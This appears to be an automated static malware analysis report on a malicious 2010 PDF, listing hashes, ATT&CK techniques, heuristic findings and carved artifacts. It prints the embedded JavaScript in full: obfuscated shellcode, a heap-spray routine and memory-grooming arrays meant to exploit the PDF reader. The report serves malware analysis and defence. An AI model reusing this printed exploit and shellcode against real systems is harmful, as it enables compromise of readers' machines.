Malicious PDF — malware analysis report

Static analysis result for SHA-256 a95289846fb432a7…

MALICIOUS

PDF

267.6 KB Created: 2010-06-29 10:30:35 +08:00 Authoring application: pdfFactory Pro www.fineprint.cn (via pdfFactory Pro 2.53 (Windows XP Professional Chinese)) First seen: 2013-02-27
MD5: fb3ef5160f72adcf1b1c75972d96cb2b SHA-1: 28b14100efc0e2eef6a353e3ceed2361b3c0655f SHA-256: a95289846fb432a7470ebb8b6ea36d1d08d7bd34661e305e4eedb5b1a3fc3b26
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file contains embedded JavaScript that is heavily obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection of 'Win.Trojan.Agent-36159' and the ML classifier's high confidence score further support the malicious nature of this file. The embedded JavaScript is the primary indicator of malicious intent, likely facilitating the execution of further malware.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9966

Heuristics 10

  • ClamAV: Win.Trojan.Agent-36159 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Agent-36159
  • Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGE
    A valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
  • RichMedia (Flash) high PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector (matched inside decoded stream)
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload (matched inside decoded stream)
  • External URI info PDF_URI
    PDF contains an external URL action
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.fineprint.cn PDF link annotation
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In PDF document text
    • http://adobe.com/AS3/2006/builtinloaderInfoIn PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj-001_000.js pdf-javascript-stream PDF /JS object -1 at offset 0x392 2528 bytes
SHA-256: bcf487f0f561f965437d350b0af6829ad91de0645ce1214efc670fe5b5958ecb
Detection
ClamAV: Win.Trojan.Agent-36159
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var ss;//ahlfah

for(i=0;i<18000;i++)

ss = ss+0x70;

function urpl(k,sc)
{
	var c = "u";
	var kc=k+c
	var re = /XX/g;
	sc = sc.replace(re,kc);
	return sc;
}

var une = unescape;

var sc = "XXc8d9XX74d9XXf424XXeebaXXe0ecXX29deXX5fc9XX37b1XX5731XX8314XX1001XX2602XX4207XXdee0XX55eeXXdee4XXeceeXXbabfXXdc4fXXdee0XX67eeXXd2a0XX9c65XX73fcXX8465XX8fe8XX9965XX55dcXXc29aXXdd98XXba1bXXa86bXXefceXXed15XXa527XX73a1XX29edXX05d3XX52e1XXe6f0XX981cXX1fe8XXe125XX04e3XX07aeXXe511XX99f1XX8007XXb265XXddc4XX8a33XXd26bXX67a5XXc2beXX31edXXda6bXXef65XX7525XX0eb7XXed5cXX6f35XXda23XXec84XX21b3XX10b9XXd9dbXX1f9bXX8169XX7512XX8cb2XX9b11XX21e4XX1099XX891fXX7516XX9e8aXXec86XXdef0XX13eeXXd697XX13bcXX2ab7XXab67XXb418XX61eeXX2aa7XX13beXXd697XX9b11XX2118XX1099XX891fXX671eXXd2afXXab65XX1e18XX6de6XXee60XXacdfXX2902XXbb11XX3618XX13a3XX211fXX89f8XXce1aXX26baXX4f4fXXe442XXa83aXX7743XX019dXXc2bcXXdee4XX14a9XXdee0XXf2f0XXdee3XXeec2XXdee0";
sc = une(urpl("%",sc));

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";
var s3 = "\x73\x75\x62\x73\x74\x72";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}
function s()
{
c=p(a("58585858"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c[s2](0,(0x5858-0x24)/2);
b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb070058585858154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700"));
b += sc;
b += c;
d = b[s2](0,0x10000/2);
e = c[s2](0,0x8000-(0x1020-0x08)/2);
while(d[len] < 0x80000) d+=d;
_3 = d[s2](0,0x80000-(0x1020-0x08)/2);
_4= new Array();
_5 =    new Array();
for(i=0;i<0x300;i=i+1)
for(j=0;j<16;j++)
 _5[i*16+j]=e+"y";

for(i=0;i<0x300;i=i+1)
for(j=0;j<15;j++)
 _5[i*16+j]=null;


for(i=0;i<0x250;i=i+1)	_4[i]				=_3		+ "s";
}
s();
stream_011_off00040b00.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x40B00 419 bytes
SHA-256: 50a053206d85c622062389d3a0c86603ef19af8c58b2cd6a12c9a805c70d26bf
objstm_0017_00.bin pdf-objstm-decoded PDF /ObjStm 17 0 obj (inflated) 871 bytes
SHA-256: dd7918c182d6e2b8d996a6b8ee81663c49a0cb297efe1e1fa3c5af0c987bde84
font_00_sfnt_off00040c76.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x40C76 3200 bytes
SHA-256: da221eaf9c0703b15f52b4a6970fa71a439df3d18f75c8d84d8a42bde6044dfb
polyglot_child_pdf_off0003fb02.pdf polyglot-child-pdf Secondary PDF body inside pdf container at offset 0x3FB02 13136 bytes
SHA-256: c47c4c4cd061f300426db998205066483446e6d505344abd55292cb50df88291
polyglot_child_pdf_off00041665.pdf polyglot-child-pdf Secondary PDF body inside pdf container at offset 0x41665 6125 bytes
SHA-256: 0b1c923c8a0028794f3a3244dc498786746334f394e41678cc58ffbeb707d0a8